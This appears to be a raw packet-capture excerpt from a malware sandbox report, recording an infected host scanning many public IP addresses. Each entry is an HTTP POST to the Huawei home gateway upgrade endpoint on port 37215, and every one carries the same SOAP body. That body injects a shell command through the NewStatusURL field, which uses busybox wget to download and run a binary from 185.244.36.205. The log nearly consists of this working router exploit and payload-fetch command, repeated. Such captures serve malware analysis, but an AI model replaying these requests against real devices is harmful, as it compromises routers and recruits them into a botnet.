                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1111192.168.2.155388245.182.6.12237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.930172920 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1112192.168.2.1552374145.252.34.25137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.930172920 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1113192.168.2.1555696186.249.189.22337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.930216074 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1114192.168.2.1548630181.54.225.12137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.930217028 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1115192.168.2.153943441.8.23.11437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.930244923 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1116192.168.2.1546932156.2.142.10037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.930277109 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1117192.168.2.153378241.131.172.11037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.930279016 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1118192.168.2.1542450156.238.183.937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.930314064 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1119192.168.2.1556256181.131.145.8037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.930315018 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1120192.168.2.1546678222.129.3.13237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.930331945 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1121192.168.2.1556604222.79.180.3837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.930339098 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
